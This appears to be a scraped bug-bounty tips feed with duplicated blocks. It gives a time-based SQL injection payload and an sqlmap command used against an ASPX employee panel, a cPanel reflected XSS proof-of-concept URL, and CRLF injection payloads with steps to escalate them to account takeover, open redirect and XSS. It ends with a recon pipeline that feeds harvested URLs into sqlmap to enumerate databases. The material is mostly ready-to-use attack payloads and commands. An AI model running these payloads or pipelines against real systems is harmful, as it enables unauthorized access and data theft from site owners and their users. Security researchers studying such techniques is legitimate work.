for who asking about write up
found employee panel running with aspx
all the time i try Sql in user parameter
1)
i used sleep payload
';WAITFOR DELAY '0:0:5'--
and the server get DELAY for 5 s
2)
save Post request in txt
sqlmap -r txt -p user --force-ssl --level 5 --risk 3
found employee panel running with aspx
all the time i try Sql in user parameter
1)
i used sleep payload
';WAITFOR DELAY '0:0:5'--
and the server get DELAY for 5 s
2)
save Post request in txt
sqlmap -r txt -p user --force-ssl --level 5 --risk 3
Top P1 to find :-
1) SQL Injection
2) IDOR
3) XSS
4) CSRF
5) Session Fixation
6) OAuth Misconfiguration
7) Missing Authentication
8) Session Hijacking
9) Secret Tokens / Secret Credentials leakage
10) Use of Default Credentials
1) SQL Injection
2) IDOR
3) XSS
4) CSRF
5) Session Fixation
6) OAuth Misconfiguration
7) Missing Authentication
8) Session Hijacking
9) Secret Tokens / Secret Credentials leakage
10) Use of Default Credentials
👍1
cPanel xss
PoC: /login?user=sth%22+onfocus=%22alert()%22+id=%22xss%22+%22%ff#xss
PoC: /login?user=sth%22+onfocus=%22alert()%22+id=%22xss%22+%22%ff#xss
CRLF Tip:
Starting payloads:
/end/vuln/%0a%0d
/end/vuln/%0a
...etc.
Now escalate the impact:
1- ATO
If the web app vulnerable to Session Fixition, simply set a new cookie using the CRLF and send it to the Victim, then try to login with the injected cookies
2- Open redirect
Just add "Location:" header
3- XSS
- Add the "Location:" header with the value: "javascript: confirm(1)"
- Add the "Content-Length:" header this will make the response body read it at the end of response headers, then add your XSS payload
Starting payloads:
/end/vuln/%0a%0d
/end/vuln/%0a
...etc.
Now escalate the impact:
1- ATO
If the web app vulnerable to Session Fixition, simply set a new cookie using the CRLF and send it to the Victim, then try to login with the injected cookies
2- Open redirect
Just add "Location:" header
3- XSS
- Add the "Location:" header with the value: "javascript: confirm(1)"
- Add the "Content-Length:" header this will make the response body read it at the end of response headers, then add your XSS payload
👍1
Methods To Find Sqli
by 'Aswin Govind'
1. sublist3r -d target | tee -a domains
2. cat domains | httpx | tee -a alive
3. cat alive | waybackurls | tee -a urls
4. gf sqli urls >> sqli
5. sqlmap -m sqli.txt --dbs --batch
by 'Aswin Govind'
1. sublist3r -d target | tee -a domains
2. cat domains | httpx | tee -a alive
3. cat alive | waybackurls | tee -a urls
4. gf sqli urls >> sqli
5. sqlmap -m sqli.txt --dbs --batch
Forwarded from xAL7x Cyber (copyright: © xAL7x)